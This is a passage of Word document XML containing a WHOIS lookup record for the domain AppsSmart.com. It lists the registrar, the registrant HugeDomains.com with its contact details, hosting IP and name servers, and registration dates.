        <w:t xml:space="preserve">  Tech Contact Domain Admin / This Domain is For Sale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>HugeDomains.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2635 Walnut Street,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Denver, CO, 80205, US</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>(p)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>IP Address 52.71.57.184 - 813,907 other sites hosted on this server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  IP Location United States - Virginia - Ashburn - Amazon Technologies Inc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ASN United States AS14618 AMAZON-AES, US (registered Nov 04, 2005)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Domain Status Registered And No Website</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">IP History 227 changes on 227 unique IP addresses over 14 years   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Registrar History 4 registrars with 2 drops   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Hosting History 10 changes on 6 unique name servers over 14 years   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Whois Record ( last updated on 2023-07-12 )</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Domain Name: AppsSmart.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registry Domain ID: 1688302902_DOMAIN_COM-VRSN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registrar WHOIS server: whois.NameBright.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registrar URL: http://www.NameBright.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Updated Date: 2020-11-15T00:00:00.000Z</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Creation Date: 2011-11-21T19:21:43.000Z</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registrar Registration Expiration Date: 2025-11-21T00:00:00.000Z</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registrar: TurnCommerce, Inc. DBA NameBright.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registrar IANA ID: 1441</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Registrar Abuse Contact Email: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registrar Abuse Contact Phone: +1.7204960020</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registry Registrant ID: Not Available From Registry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registrant Name: Domain Admin / This Domain is For Sale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registrant Organization: HugeDomains.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registrant Street: 2635 Walnut Street</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registrant City: Denver</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registrant State/Province: CO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registrant Postal Code: 80205</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registrant Country: US</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registrant Phone: +1.3038930552</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Registrant Phone Ext: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Registrant Fax: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Registrant Fax Ext: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Registrant Email: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registry Admin ID: Not Available From Registry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Admin Name: Domain Admin / This Domain is For Sale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Admin Organization: HugeDomains.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Admin Street: 2635 Walnut Street</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Admin City: Denver</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Admin State/Province: CO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Admin Postal Code: 80205</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Admin Country: US</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Admin Phone: +1.3038930552</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Admin Phone Ext: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Admin Fax: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Admin Fax Ext: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Admin Email: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registry Tech ID: Not Available From Registry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Tech Name: Domain Admin / This Domain is For Sale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Tech Organization: HugeDomains.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Tech Street: 2635 Walnut Street</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Tech City: Denver</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Tech State/Province: CO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Tech Postal Code: 80205</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Tech Country: US</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Tech Phone: +1.3038930552</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Tech Phone Ext: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Tech Fax: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Tech Fax Ext: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Tech Email: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Name Server: nsg1.namebrightdns.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Name Server: nsg2.namebrightdns.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
